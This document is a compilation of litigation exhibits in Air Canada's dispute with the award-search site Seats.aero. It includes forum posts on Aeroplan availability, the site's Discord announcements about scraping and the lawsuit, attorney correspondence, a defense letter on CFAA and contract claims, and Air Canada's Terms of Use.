# EXHIBIT 1

 **r/Aeroplan** · 4 mo. ago
Ok_Geologist_4767

···

## PSA: Aeroplan blocking partner award availability

As of August 24th, Aeroplan has essentially removed at least ANA, BR availability online. Regardless if you book 355/360 days in advance, you will not see availability. There is an entire thread in FlyerTalk documenting the same, despite United / Expert Flyer showing availability.

As a result, flight to Japan that typically cost 45K in economy now shows 125K aeroplan needed, business that typically shows 72K now needs over 300K in redem

Hopefully this is a temporary glitch.. but considering how they have removed Etihad J before and it has not come back since, I am not counting for a quick resolution. This may be tied to fraudulent family sharing, or something else...maybe a larger change?

Either way, there has been no communication from AP and this is certainly distressing as partner redemption is the best redemption one can still get despite it already being difficult to book.

 **jaxify1234** · 4 mo. ago

Noticing the same thing. Hopefully this isn't the beginning of Aeroplan devaluation

⇧ 0 ⇩     💬 Reply     ↑ Share     ···

**Sea-Trainer6585** · 4 mo. ago

This is all definitely frustrating, I hope current partner award bookings won't be affected

⊖     ⇧ 1 ⇩     💬 Reply     ↑ Share     ···



**OldInvite4551** · 4 mo. ago

Dropping in an additional data point.

Just got off the phone with AP rep. They confirmed an internal post dated 8/23 that Lufthansa group bookings have temporarily been suspended while they work to correct some sort of technical issue (implied fraud). They also mentioned that Turkish Airlines was likely to be added. They recommended to call back in a few weeks.

2 days ago I completed a J redemption on Swiss via call center. Availability was not showing on AC but was there on United.

When I tried to call in today and book my return flight, the agent was unable to see the availability, and then read through the above mentioned docs of LH partner awards.

Here's hoping they get it figured out...

⇧ 5 ⇩     💬 Reply     ↑ Share     ···

# EXHIBIT 2



← → C ⌂ 🔒 flyertalk.com/forum/air-canada-aeroplan/2061344-complaints-about-lack-partne

☰   🔍   News   Forums   💬 flyertalk™

🖼 Aug 24, 23, 12:41 pm   ⬛

**FlyerTalk Forums Expert How-Tos and Guides**   Last edit by: PES_B1

## KNOWN ISSUES AS OF NOVEMBER 2023

- **Location-based (due to high levels of fraud):**
  - **Flights to/from India** on <u>partner metal</u>: not available for booking online, may be available by phone; AC metal flights available online
    - This applies to most partners, but not all. Flights may be available to book online with AI, UA, or UK metal
    - All domestic India redemptions appear to be blocked as well, although domestic legs (e.g. DEL-BOM) may be available as part of an international itinerary
  - **Flights to/from China (including HKG and MFM)** on <u>partner metal</u>: not available for booking online, available by phone(Last verified 05/12/2023) , phone booking fees can be waived; AC metal flights available online
- **Airline-based:**
  - Unclear as to why, and have been unavailable for months:
    - **Etihad**: J and F rewards not available at all
    - **Oman Air**: not available at all
  - Likely linked to fraud issues, and fairly recent:
    - **Lufthansa group (LH, LX, OS, SN, EW, 4Y, EN)**: not available for booking online, may be available by phone
    - **Thai**: appears to not be bookable online; unclear whether it can be booked by phone
    - **EVA and ANA**: possibly limited ability to book flights to/from North America; unclear whether they can be booked by phone
    - 

« Show less

🖨

---

## Complaints about lack of partner availability on Aeroplan (2022 onwards)

**↩ Reply**   **Subscribe 🔔**

**☑ View First Unread**   **Thread Tools ⌄**   **Search this Thread ⌄**

📑 Dec 7, 21, 2:38 pm   #1

**bennyblanco**

🏷 Original Poster ⓠ

Join Date: Jan 2013

**Complaints about lack of partner availability on Aeroplan (2022 onwards)**

Is it just me or has it been possible in the past to book flights outside of Canada using Air Canada partners via Aeroplan?



# EXHIBIT 3

You are currently in preview mode. Join this server to start chatting!   **Join Seats.aero Community**

Seats.aero Community ⌄

📣 announcements   Follow

# Welcome to
# Seats.aero Community

This is the beginning of this server.

March 5, 2023

📣 Browse Channels **NEW**

📣 announcements

📋 faqs

⌄ TEXT CHANNELS

# general

# feature-requests

# ios-feedback

# android-feedback

# api-feedback

# hotels-beta

**ian** 03/05/2023 3:30 PM
👋 Welcome to the new Seats.aero discord! We created this to have a space to discuss travel, points/miles, and anything else related to Seats.aero. We just put the invite link up on the site so we should start to see people joining. 🙂

General rules apply: nothing inappropriate or obscene, no spam or referral links, etc.

Will use this channel ( #announcements ) to mention new features/improvements to Seats.aero! If you have any feature requests, feel free to throw them in #feature-requests. For support, it's best to use the chat widget on our site, but if you have a general question feel free to post it here as well.

👋 9    🥈 2

**ian** 03/05/2023 3:44 PM
Some recent additions:

* Virgin Atlantic and Delta SkyMiles now have detailed flight information available. You can click the ℹ️ icon to view the flight times, taxes, etc.

Since Virgin Atlantic and Delta are now in the same alliance, we also use detailed flight information to show you if the same flight can be booked at a cheaper cost from another program. For example, this LHR/BOM flight is nearly 50% cheaper through VS than from DL!

* Detailed flight information will now show you the last time this flight was available for booking in that cabin. This can help you figure out if an airline often releases space on the flight/date you are looking at, or if it has never been released at all and is unlikely to appear.

* Pro users can now filter alerts by carrier or by direct flights!



👍 12

March 7, 2023

**ian** 03/07/2023 11:38 PM
We just launched support for Emirates Skywards 👀 https://seats.aero/source/emirates

Missing a lot of routes right now but it should get better quickly. 🙂

**Seats.aero - Emirates Skywards Award Flights**
Easily find last-minute reward availability on popular airlines and mileage programs.

🥳 8    👍 7    🙌 1

March 8, 2023

**ian** 03/08/2023 12:53 PM
Looks like Etihad took down their award bookings, so we can no longer update availability. We should be able to update again once they are back online in a few days, hopefully with new AA support! (edited)
🙏 3

March 21, 2023

If the availability is higher than normal, we'll automatically post an alert in this channel to let you know about the increased availability! In the future, we also plan to detect when flights have become cheaper than normal, etc. This will let you beat the race to any sales or promotions airlines may be offering, as they're often released before the airline posts about it.

For example, the first few alerts show a large release of seats for ATL/BOG and JFK/BOG on DL via VS. 🙂

**Seats.aero** `BOT`  Today at 4:29 PM

Seats.aero

**BOG/ATL via Virgin Atlantic**

A large amount of seats have been released on BOG/ATL via Virgin Atlantic!

**Source**          **Increase in J Seats**
Virgin Atlantic      ⬆ 18 seats

💬 13    😄 2    🙌 4

---

April 12, 2023

**ian**  04/12/2023 7:55 PM

We now support annual plans for Seats.aero Pro, at $79.99/year! Many people have requested a longer term for the Pro plan and you will get a $16 discount for subscribing this way.

If you already have a Pro account, you can convert your account to this plan under "Manage Account", and you'll automatically get a credit for the time left on your monthly plan. Otherwise you can select this option while signing up for a new one!

Seats.aero

Billing > Plans

**Update your plan**

Monthly | Yearly

Seats.aero Pro            ✓ Selected
$79.99 per year

Subscribe to Seats.aero Pro for access to millions of additional seats, SMS alerts, and more advanced features! You'll use the email address you provide here to login on Seats.aero.

Subtotal                  $79.99 per year

Continue

💬 1    ❤ 9

---

April 20, 2023

**ian**  04/20/2023 1:41 AM

Hi @everyone,

I'm excited to announce that we've added support for Air Canada Aeroplan! This has been our biggest requested feature for a while and I'm happy that we get to introduce it. Aeroplan fully supports alerts and individual flight information. You can start using it now in Search or change your selected airline to Aeroplan in the top-right.

Aeroplan is a program with dynamic pricing, and also commonly generates mixed-cabin itineraries. For Aeroplan, we will display mixed-cabin routings so long as 95% of the flight time is in the intended cabin (i.e. <5% is in economy when searching for business). In the cases where Aeroplan uses dynamic pricing, we use an algorithm to determine if the price is reasonable or not. We show fixed-price routings in all cases.

It will take a few days for us to get all of the routes and availability loaded up, but there's a good amount of data already. We'll be polishing it up over the next few days as well.



Change mileage program

Aeromexico Club Premier
Air Canada Aeroplan  New!
American Airlines
Avianca LifeMiles
Delta SkyMiles
Emirates Skywards  New!
Etihad Guest
United MileagePlus
Virgin Atlantic Flying Club



...ts with Qsuites, but the entire routing

operated with Qsuite business

🙏 2    👍 3

May 14, 2023

**ian** 05/14/2023 1:57 PM
It appears Air Canada tried to block us from searching for availability starting on Friday. I just put in a fix for it so you should see availability start to refresh again.

🖼 7    🙏 5

May 15, 2023

**ian** 05/15/2023 7:54 PM
Hey @everyone, some new features for Monday:

- Emirates now supports extended availability for every route, regardless of length. Hopefully we can bring this to more carriers over time!
- Alerts created by Pro users with specific dates will now refresh the availability with the airline if the data has become stale. This will significantly improve your ability to find open seats farther out, as the alert will refresh the availability more often than is typical.

(We will never delay or prioritize alerts like some of our competitors do -- if someone creates an alert and it discovers a new seat is available, everyone with an alert for that flight will get it at the same time and it immediately appears on our site regardless of membership/etc.)

🙏 23    🖼 8    🖼 1

May 17, 2023

**ian** 05/17/2023 5:41 PM
Hi @everyone,

I'm excited to announce the beta of the Seats.aero iOS app is beginning today! As you've probably noticed, our site is not very friendly on mobile, but a large amount of people still use Seats.aero on their phones. Our native apps will allow you to filter, search, and book award trips just like you can on the website today.

Our beta is limited to Pro users for now; we'll post the TestFlight link in the Pro Discord channel (link your account under "Linked Roles" in the top left to join). At the moment, the functionality is a bit limited and there are some bugs, but we are working on expanding it quickly. 🙂

Let us know if you have any feedback!

❤️ 34    🔥 20    🖼 8    🏆 1    🥇 1

May 19, 2023

**ian** 05/19/2023 11:13 PM
We are testing out a new landing page for Seats.aero to help new visitors of our site get acquainted. The old homepage view is now called "Explore".

Let us know if you have any feedback on this change; sorry if it is jarring for long-time users 🙂 The old version didn't help people figure out how our site works.

👍 9    🛩 3

May 22, 2023

**ian** 05/22/2023 5:40 PM
Great video from Max Miles Points on Seats.aero: https://www.youtube.com/watch?v=xiA14p7C38o

YouTube

🔥 7

May 28, 2023

**ian** 05/28/2023 4:15 AM
Hey @everyone.

**New feature!** You can now view PN/PZ inventory for United-operated flights. Normal members can use PZ space to process mileage upgrades and PlusPoints upgrades on cash tickets. Global Services members can use PN space for this as well.

This is a great option if someone booked you a ticket with cash and you want to upgrade, or if award space isn't looking good but there's open upgrade space.

Data may take a few days to fully roll in.



👍 11    ⭐ 2

May 30, 2023

**ian** 05/30/2023 5:56 PM
Hi @everyone,

I'm excited to say that our brand new app for iOS is now available for free on the App Store! You can now easily find award flights across all of our mileage programs in our native iOS UI.

Although the app has many core features of Seats.aero, we are actively working on adding several more features, including alerts, Pro accounts and extended availability, and more.

Please give it a download and check it out: https://apps.apple.com/us/app/seats-aero/id6449265212 You can use the #ios-feedback channel for any feedback!

App Store
**Seats.aero**
Seats.aero is a supercharged way to book flights with your points and miles. Stop searching on outdated airline websites and immediately discover what flights can be booked with points.

Book flights on the major airline alliances: Star Alliance, OneWorld, and SkyTeam flights can all be discovered i...

🔥 28    🎉 11    🤣 3    🏠 3    ❤️ 4    📷 3    💬 1    📷 1    👍 1    🤩 2

May 31, 2023

**ian** 05/31/2023 7:47 PM
Minor update: We now search for Emirates availability significantly faster than our previous version, and most close-in availability is now updated every 1-3 hours. Extended availability is updated much faster as well. Hope this helps you find more EK J/F flights 😊

June 1, 2023

**ian** 06/01/2023 1:13 AM

Aeroplan loaded our servers again. We got around the Aeroplan ban again. We will keep getting around it, but just as a heads up, it is not the most reliable airline if you want to set alerts for Star Alliance. Use Avianca or United as your first choice.

😊 14   ✌️ 2   ✏️ 1   1

**ian** ⬤ 06/01/2023 7:33 PM
Route statistics now allow you to see the trend in average pricing for each cabin. You can easily spot when devaluations have begun and how bad they are, and compare the pricing changes to the available seats.

(Unsurprisingly, United did not release any more seats despite the devaluation...)



😊 7   🙏 4

**ian** ⬤ 06/01/2023 10:50 PM
Hi @everyone,

I'm excited to say that we've added support for Alaska Mileage Plan to Seats.aero! You can now easily find more Oneworld and Alaska partner availability via our site. Alaska may be especially helpful for identifying which AA-operated flights can be booked via other partners such as British Airways.

It may take a few days for all routes and data to load, but feel free to submit route requests in the interim! Check it out at https://seats.aero/alaska.



👍 43   🙌 22   🔥 22   ❤️ 21   4   🖼️ 6   🟩 4   😍 1   😊 1

June 2, 2023

**ian** ⬤ 06/02/2023 7:19 PM
We've added a new status page at https://seats.aero/status (linked in the Tools menu). You can use this page to see the current status of our integrations with the various airlines. Occasionally, an airline will block our systems or experience an outage, which prevents us from updating our data with new availability.

This page is automatically updated by our systems to reflect if we are receiving updated data from a particular airline or not. If an airline is listed as Degraded or Outage, this may be why data is older/not refreshing on the site.

| Seats.aero – System Status |
| --- |
| Easily find last-minute reward availability on popular airlines and mileage programs. |

❤️ 8   🙌 5   🟩 3

**ian** ⬤ 06/02/2023 10:46 PM
Hi @everyone,

We've added a new feature to Search — you can now select multiple airports as either your origin or destination! You no longer need to rely on multi-city codes as the only way to search between airports. You can even mix and match multi-city codes and normal airports in the same search. The auto-complete is also easier to handle.

For example, you can now search for availability from SFO or NRT to ANZ, even though the origins are in completely separate continents. You could also search from ASA (Asia) to EUR and USA and find all of these options all at once.

you can explore Air Canada-operated flights that have eUpgrade inventory available and even download a CSV of what's available.

Pro users can access it at https://seats.aero/eupgrade. Since we just started collecting this data, the data is not yet complete for all routes.



👏 14   🙏 1

---

August 13, 2023

**ian** 08/13/2023 5:25 PM
Aeroplan has been down for a bit now, mostly because they are breaking their website for most real users. We are working on bringing it back and should have some progress on Monday or so. Sorry for the trouble!

🙌 14   👍 2

---

August 15, 2023

**ian** 08/15/2023 11:12 PM
🎌 We've added support for Air France/KLM Flying Blue! You can now easily find award flights across SkyTeam and grab great deals, especially on their own (AF/KL) metal.

https://seats.aero/flyingblue

Routes and availability may take a bit to fully populate as our system loads the initial data from Flying Blue.



**Seats.aero - Explore Air France/KLM Flying Blue Award Flights**
Easily find last-minute reward availability on popular airlines and mileage programs.



👏 38   👏 8   🙏 9   🖼️ 4   🤩 3   🖼️ 3   2️⃣ 2   👍 3   💙 1

---

August 17, 2023

**ian** 08/17/2023 12:52 PM
Hi all, as you may have noticed, there has been a lot of instability with Aeroplan lately. This has been occurring because they have configured their security service (Akamai) with extreme anti-bot rules that block most legitimate users. As a result, I cannot even search the Aeroplan website myself, and a lot of users have experienced this as well.

We have rolled back to our previous method of searching Air Canada, which we expect to be more stable and is actively updating data now. However, this does mean we will no longer obtain seat counts for Aeroplan flights, and can no longer access Air Canada eUpgrade data. We will adjust alerts for Aeroplan with minimum seat counts in the coming days as these will no longer match any flights. We expect that over the next few weeks, we can go back to our method of searching with seat counts and eUpgrades, but for now it is not available.

A lot of other search tools that claim to search Aeroplan are not working right now. It's unfortunate that Air Canada is unwilling to work with the search tools, and even though we have reached out to them they apparently will not talk to us.
(edited)



am not sure what browser is not banned at this point.

While we'd like to keep maintaining LifeMiles, it is getting absurd. We have tried to reach out to them several times, and at one point 10+ LifeMiles employees viewed my LinkedIn in one day, but they are refusing to work with us. We'll continue to try and keep LifeMiles support on Seats.aero going for the forseeable future, but the recent outages will likely continue due to their decisions.

Just want to provide clarity on why the data has been stale recently and what is happening behind the scenes. Keep an eye on https://seats.aero/status to see the live status of our mileage programs. Sadly other award tools don't provide status updates, so they might advertise LifeMiles as supported when it's not working.

**Seats.aero - System Status**
Easily find last-minute reward availability on popular airlines and mileage programs.

🗃️ 3   😢 13   🙏 7   🙏 9

September 22, 2023

**ian**  09/22/2023 11:13 AM
Very minor but your selected page count now persists in Search as well in Explore! Also fixed a bug in refreshing data in Search.

👍 10

September 25, 2023

**ian**  Yesterday at 11:16 PM
Hi all, we've started to track all domestic routes for Delta SkyMiles, which should help you find more awards, positioning flights, etc! Pro users can request any Delta domestic route of any length now via the request a route feature. This is on top of our support for all domestic Alaska Airlines routes as well. We will continue to expand domestic availability to more programs over time. 🚀

Expanding domestic availability will also help us in our work to add support for searching connecting flights. Our hope is that for example, if we track both BOS/JFK and JFK/BER separately, we could instantly piece together BOS/JFK/BER for you even though we don't track BOS/BER directly. Keep your eyes peeled for a beta of this feature 👀

🅿️ 14   🇪 14   🆂 14   🅾️ 14   🗃️ 18   😍 1

Follow to get this channel's updates in your own server.   Join Server   Follow



October 6, 2023

**ian**  10/06/2023 4:08 PM
Hi @everyone,

Wanted to provide an update on Air Canada Aeroplan. On Thursday, Air Canada had its attorney send a cease and desist letter to Seats.aero. Their letter demanded that we must stop retrieving availability from Aeroplan just 25 hours after receiving the letter. Their letter appears rushed and we believe it has no valid legal basis or argument, and could apply to any site or tool that searches Air Canada Aeroplan for reward availability.

Seats.aero works by periodically visiting the public websites of airlines and retrieving the reward availability for each date and route. This common practice is usually called "web scraping" or similar names and is used by all travel tools in some form. Courts have routinely held that retrieving public information from public websites is legal and does not require us to follow any restrictions the airlines may try to arbitrarily impose, as we are just visiting their public websites.

It appears that Air Canada is trying to intimidate us into shutting down Seats.aero's support for Air Canada, and potentially other travel sites as well. We do not intend to comply with their request and will continue to maintain Seats.aero's support for Aeroplan for the foreseeable future. We are confident in our position, and if needed, we will see Air Canada in court and defend our practices to the fullest extent possible.

💯 257   🤛 163   4️⃣2️⃣ 42   👀 34   🗃️ 37   🗃️ 62   👍 51   ❤️ 305   1️⃣3️⃣ 13   🙏 22

😍 21   🐐 4   17   🇨🇦 18   😂 22   🗃️ 16   1️⃣4️⃣ 14   🗃️ 10   1️⃣3️⃣ 13   🔥 16

**ian**  10/19/2023 3:23 PM

Hi @everyone,

Unfortunately, we have learned that Air Canada filed a lawsuit against us today in the US District Court for Delaware to try and shut down Seats.aero's support for Air Canada. We attempted to work with Air Canada several times, including offering to change how our scraping worked, but they refused to work with us and filed this lawsuit without any further notice. This is a hostile move against all award travel tools.

Air Canada is alleging that we are retrieving availability too quickly for Star Alliance to handle, but we retrieve availability from other Star Alliance airlines at the same rate, and they appear to have no IT issues coming from it and have never complained to us. We have built our systems to protect the airlines from excessive load, as we search Air Canada for availability at a fixed rate and have controls in place to rate limit all requests sent to Air Canada's systems. When our users view Aeroplan results on Seats.aero, they no longer have to go run the same search on Aeroplan's site, saving them resources.

Air Canada is alleging our searches caused them issues but do not acknowledge other points search sites and malicious third-parties that are known to scrape Air Canada as well, and they don't attempt to distinguish our searches from them at all. The complaint doesn't quantify our searches compared to anyone else. Additionally, Air Canada tries to paint us as malicious hackers despite us having previously worked with them to resolve cybersecurity issues in their own systems.

We are disappointed in this outcome but we are determined to fight this unfair attempt to shut down Seats.aero's support for Air Canada. If you are a Seats.aero user but not a Pro user, we encourage becoming one if you can to help us fight this lawsuit, which will take a lot of resources for our small company. Thanks for your support during this time.





**Seats.aero Community** | general

**Browse Channels** NEW

announcements

faqs

TEXT CHANNELS

# general

# feature-requests

# ios-feedback

# android-feedback

# api-feedback

# hotels-beta

ALLIANCES

# airlines-misc

# oneworld

# skyteam

**@minibusy** I don't have much experience with Aeroplan, but I've tried searching a few different times today, and I just keep getting the site's spinner and the search results nev

**Kers** 05/28/2023 12:31 AM
Aeroplan search engine is buggy for a long time. Recent crash didn't help either.
You could try the app.

**minibusy** 05/28/2023 12:32 AM
Ah, interesting. Sounds worth a try; thanks!

**Kers** 05/28/2023 12:33 AM
I usually check UA and expert flyer first then pray aeroplan's search engine would give the ideal routing. (edited)
Because if not then you had to wait hours for aeroplan callback to book everything on the phone.

**minibusy** 05/28/2023 12:35 AM
Ah, heh, I'm trying the opposite. I searched UA, the calendar showed cheap availability on certain dates, but the actual flights are expensive, so I figured I'd try Aeroplan to see what it says.

**Kers** 05/28/2023 12:35 AM
If aeroplan phone queue is full they won't even give the option for a callback.

**minibusy** 05/28/2023 12:39 AM
Looks like the AC app works, and the UA calendar probably is indeed outdated.
(I was a bit surprised the calendar part didn't update itself even after clicking on a specific date to get the results for that date.)

**ian** 05/28/2023 1:21 AM
turns out everyone caches availability, seats.aero is just the only one transparent about it 😄
looks like we are having trouble updating aeroplan again, seems like they are having a lot of issues

EXHIBIT 4

| | |
|---|---|
| **From:** | Susser, Steven |
| **To:** | Rettew, Doug |
| **Cc:** | Fagan, Jonathan; David Plunkett; Katz, Seth; Schwartz, Michael J. |
| **Subject:** | RE: Air Canada -- Response to October 5 Letter |
| **Date:** | Friday, October 6, 2023 3:58:46 PM |
| **Attachments:** | shield-advisory.png |
| | chevron-light.png |
| | 2020-12-04_18.51.16 (3).pdf |

**⊙ External email ❯**

**EXTERNAL Email:**

Chip: My plan is to have a letter to you by October 20. I attach the Certificate of Formation for Localhost LLC.

---

**From:** Rettew, Doug <Doug.Rettew@finnegan.com>
**Sent:** Thursday, October 5, 2023 9:59 PM
**To:** Susser, Steven <SSusser@cgolaw.com>
**Cc:** Fagan, Jonathan <Jonathan.Fagan@finnegan.com>; David Plunkett <DEPlunkett@WWRPLaw.com>;
Katz, Seth <seth.katz@finnegan.com>
**Subject:** RE: Air Canada -- Response to October 5 Letter
**Importance:** High

Mr. Susser,

Thank you for your email.  Please let us know when we can expect to receive your response.  In the meantime, since you contend that Localhost, LLC is responsible for the complained-of activities, please provide us with the details of that entity.

Thank you, Doug

**Douglas (Chip) A. Rettew**
Partner
Finnegan, Henderson, Farabow, Garrett & Dunner, LLP
901 New York Avenue, NW, Washington, DC 20001-4413
202.408.4161 | fax 202.408.4400 | doug.rettew@finnegan.com | www.finnegan.com



---

**From:** Susser, Steven <SSusser@cgolaw.com>
**Sent:** Thursday, October 5, 2023 5:51 PM
**To:** Rettew, Doug <Doug.Rettew@finnegan.com>
**Subject:** Air Canada -- Response to October 5 Letter

**EXTERNAL Email:**

Mr. Rettew: I have received a copy of your October 5, 2023 letter to Ian Carroll. To the extent the actions you reference were undertaken at all, they were undertaken by Seats.aero through its limited liability company, Localhost, LLC ("Localhost"). So, I assume that you meant to address your letter to Localhost and will respond with that assumption. If I am wrong and you are accusing Ian Carroll as an individual, we would have additional defenses.

I represent Localhost. Please direct all communication on this matter to my attention only.

First, your demand for a response by 10 am ET on October 6, 2023 is unreasonable when you did not send your demand letter until 9 am ET on October 5. I will respond in more detail to your letter presently.

Based on a cursory review, I note that this situation presents some problems for Air Canada. First, you try to bootstrap contractual liability through a browse wrap type of consent without any indication that Localhost knew of the Air Canada terms and conditions, much less accepted them. United States courts take a dim view of contract acceptance under these circumstances.

Next, your reliance on statutory law is similarly problematic for Air Canada given the application of the fair use doctrine. To the extent that Air Canada has any valid and applicable trademark rights, there is no reason to believe that a reasonable consumer would be confused into believing that Localhost is the source of Air Canada's airline services.

**Steven Susser**
**Intellectual Property and Commercial Litigation**
Carlson, Gaskey & Olds
Direct Dial:  248.283.0734
www.cgolaw.com
LinkedIn

This e-mail message is intended only for individual(s) to whom it is addressed and may contain information that is privileged, confidential, proprietary, or otherwise exempt from disclosure under applicable law. If you believe you have received this message in error, please advise the sender by return e-mail and delete it from your mailbox. Thank you.

This e-mail message is intended only for individual(s) to whom it is addressed and may contain information that is privileged, confidential, proprietary, or otherwise exempt from disclosure under applicable law. If you believe you have received this message in error, please advise the sender by return e-mail and delete it from your mailbox. Thank you.

# EXHIBIT 5

# CARLSON, GASKEY & OLDS

### A PROFESSIONAL CORPORATION

David L. Atallah
Todd W. Barrett
Timothy C. Bradley
Karin H. Butchko
John E. Carlson
Anthony P. Cho
Benjamin J. Coon
Jessica Fleetham
David J. Gaskey
William S. Gottschalk

400 WEST MAPLE ROAD
SUITE 350
BIRMINGHAM, MI 48009

Telephone 248.988.8360
Facsimile 248.988.8363

Matthew L. Koziarz
Kerrie A. Laba
Timothy J. Murphy
Theodore W. Olds, III
Michael J. Schwartz
Stephen A. Sequin
John M. Siragusa
Steven Susser
Alex Szypa
Brian S. Tobin

October 17, 2023

Direct Dial: 248.283.0734
Email: ssusser@cgolaw.com

**FEDERAL RULE OF EVIDENCE 408 COMMUNICATION**

**VIA EMAIL AND U.S. MAIL**

Douglas A Rettew
Finnegan, Henderson, Farabow, Garrett & Dunner, LLP
901 New York Avenue, NW
Washington, DC 20001-4413
Doug.rettew@finnegan.com

> **Re: Air Canada Allegations**

Dear Mr. Rettew:

We have reviewed the letter that you sent on behalf of Air Canada and Aeroplan Inc. ("Air Canada") alleging that our client Localhost, LLC, d.b.a. Seats.aero ("Seats.aero") has violated certain rights of Air Canada. In reviewing the allegations and Air Canada's Terms of Use, we have concluded that (1) Seats.aero has not violated the Computer Fraud and Abuse Act, 18 U.S.C. § 1030 ("CFAA"), (2) Seats.aero has not violated the Trademark Act, and (3) Air Canada cannot establish a breach of contract claim. Accordingly, Seats.aero will not stop gathering data from Air Canada's website.

At the outset, it is worth discussing Seats.aero's services and their benefit to Air Canada. Seats.aero helps consumers with using their accumulated credit card points for air travel. Users can typically transfer credit card points from the card issuer to the point system of a specific airline and then purchase flights with those points. Frequently, flights cost fewer points through the airlines own point system than through the credit card issuer's reward system. Seats.aero gathers publicly available point pricing data from airlines so that users can explore credit card point flight options in one convenient hub. Seats.aero is a free tool for discovering flights within two months, and users can pay a small subscription fee to search all routes.

As you know, a claim for breach of contract requires establishing damages. *See, e.g., Miller-Davis Co. v. Ahrens Constr., Inc.,* 495 Mich. 161, 178 (Mich. 2014) ("causation of damages is an essential element of any breach of contract action."). Here, Seats.aero's services only serve to benefit

Seats.aero's Response
Page 2

Air Canada in filling seats that Air Canada releases through its point system. Seats.aero is providing free advertising for Air Canada. If Seats.aero's data scraping is causing harm to Air Canada of a more technical nature - for example, if there are some costs or technical difficulties associated with Seats.aero's searching operations - please let us know. Seats.aero would be willing to make reasonable modifications to its searching operations.

Regarding Air Canada's CFAA allegations, federal courts have explicitly held that data scraping does not violate the statute. In *hiQ Labs, Inc. v. LinkedIn Corp.,* 31 F.4th 1180 (9th Cir. 2022) the Ninth Circuit found that "the CFAA's prohibition on accessing a computer 'without authorization' is violated when a person circumvents a computers generally applicable rules regarding access permissions, such as username and password requirements, to gain access to a computer. It is likely that when a computer network generally permits public access to its data, a user's accessing that publicly available data will not constitute access without authorization under the CFAA." *hiQ*, 31 F.4th at 1201. The court held that the CFAA does not prohibit data scrapping of a website. *Id*. See also *Meta Platforms, Inc. v. BrandTotal Ltd.*, 605 F. Supp. 3d 1218, 1262 (N.D. Cal. 2022) ("where a website is made available to the public without any authentication requirement in at least the first instance, the concept of 'without authorization' does not apply.").

Air Canada's trademark allegations are equally problematic. The doctrine of nominative fair use protects Seats.aero's use of Air Canada's mark. The doctrine has three requirements: (1) the mark is necessary to identify the user's services, (2) the user does not use more of the mark than necessary, and (3) the user must do nothing that would suggest endorsement by the trademark holder. *See Century 21 Real Estate Corp. v. Lendingtree, Inc,* 425 F.3d 211, 232 (3d Cir. 2005). Here, Seats.aero's use meets all three requirements. It is necessary for Seats.aero to use Air Canada's mark to refer to Air Canada' flights. Seats.aero does not use the mark for anything other than indicating that a particular flight is provided by Air Canada, and Seats.aero does nothing to suggest endorsement by Air Canada. Indeed, Seats.aero displays prominently at the bottom of its home page that the website is "Not affiliated with any airline."

Regarding Air Canada's Terms of Use, there are several reasons why Air Canada does not have a claim for breach of contract. Contract formation requires an unambiguous manifestation of assent. Notably, Air Canada's website does not require users to affirmative click any "I agree" button in order to view the point costs of any flight. So, Air Canada's is relying on a pure "browsewrap" agreement, which courts have generally been reluctant to enforce. *See Berman v. Freedom Fin. Network, LLC*, 20 F.4th 849, 856 (9th Cir. 2022) ("Courts are more reluctant to enforce browsewrap agreements"). Seats.aero has never assented to Air Canada's Terms of Use, and so did not form a contract with Air Canada. Air Canada may attempt to argue that Seats.aero's mere use of the Air Canada website allegedly serves as implied assent. However, Air Canada also alleges that Seats.aero's use of the website constitutes a breach of contract. It appears impossible to square how one can assent to a contract by an act which allegedly breaches the contract. *See, e.g., Kauders v. Uber Technologies, Inc.,* 486 Mass. 557, 575 (Mass. 2021)("where the action taken does not clearly signify assent, it will be difficult for the offeror to carry its burden to show that the user assented to the terms.").

Further, even if Air Canada could establish formation of a contract, that contract would be void as against public policy. Air Canada's Terms of Use are adhesionary, serve a consumer-harming monopoly on flight and fare data, and run counter to the public interest in preserving the freedom to discuss publicly available information. *See hiQ*, 31 F.4th at 1005 (noting that preventing defendants data scraping "risks the possible creation of information monopolies that would disserve the public interest");

*see also CBC Distrib. & Mktg., Inc. v. Major League Baseball Adv. Media, L.P.,* 505 F.3d 818, 823 (8th Cir. 2007) ("[I]t would be a strange law that a person would not have a first amendment right to use information that is available to everyone.").

Further still, it appears that there are ambiguities in the Terms of Use which would muddy any attempt at enforcement against Seats.aero. To the extent that Air Canada interprets language within the "Limitations of Use" section to prohibit data scraping operations, that section also states that "You may only access or use the Website to determine the availability of and to purchase products, goods and services offered on the Website." And this is precisely what Seats.aero is doing, determining the availability of services offered on the Air Canada website. The Terms of Use are ambiguous and unenforceable against Seats.aero. *See Restatement (Second) of Contracts* § 206 (ambiguities in a contract should be interpreted against the drafter).

Finally, we are concerned with Air Canada's apparent focus on Seats.aero when there are other entities harvesting data from Air Canada's website. Any action of Air Canada in seeking to prevent Seats.aero's data scraping operations may well generate claims by Seats.aero for tortious interference with contract, as such actions would unlawfully interfere with Seats.aero's ability to provide flight information to its subscribers. The Ninth Circuit in *hiQ, Supra* found that a very similar claim had a likelihood of success sufficient to support a preliminary injunction that prevented a website owner from interfering with data scraping activities. *See hiQ,* 31 F.4th at 1191-1194. Moreover, action by Air Canada to selectively ban only a certain entity from accessing its publicly available information raises a claim for unfair competition. *See Id.* at 1193-1194 ("if companies like LinkedIn, whose servers hold vast amounts of public data, are permitted selectively to ban only potential competitors from accessing and using that otherwise public data, the result [] may well be considered unfair competition").

If you have case law that rebuts any of the above analysis, please advise. In addition, if you have a suggestion as to how the parties may work together for their mutual benefit, please let us know.

Very Truly Yours,

CARLSON, GASKEY & OLDS, PC

Steven Susser

# EXHIBIT 6





Accessibility   🍁 English ∨   FIND

## AIR CANADA

Book    Plan    Fly    Aeroplan

Home │ Legal │ Terms of Use ∧

# Terms of Use

## Welcome

Air Canada ("**Air Canada**", "**we**", "**us**", "**our**") thanks you for using our website, **www.aircanada.com**, as well as any other websites that are owned and operated by us (collectively, the "**Website**"). We believe you will find the Website informative and easy to use and we hope that it will become your primary tool when making travel plans.

## Acceptance of the Terms of Use

The following terms of use ("**Terms of Use**") govern your use of the Website. Please review these Terms of Use carefully before using the Website. Each time you access or use the Website, you are entering into a contract with us and you agree to be bound by these Terms of Use. If you do not agree to be bound by and comply with these Terms of Use, please do not access or use the Website.

We also reserve the right to deny you access to or use of the Website if we have reason to believe that you do not comply with these Terms of Use.

## Changes

Air Canada reserves the right to change these Terms of Use at any time. We will notify you of any changes by posting an updated version of the Terms of Use on this Website. It is your responsibility to regularly review these Terms of Use. If you use the Website after we make any changes, it means you have accepted the changes and that you agree to be bound by the Terms of Use as modified.

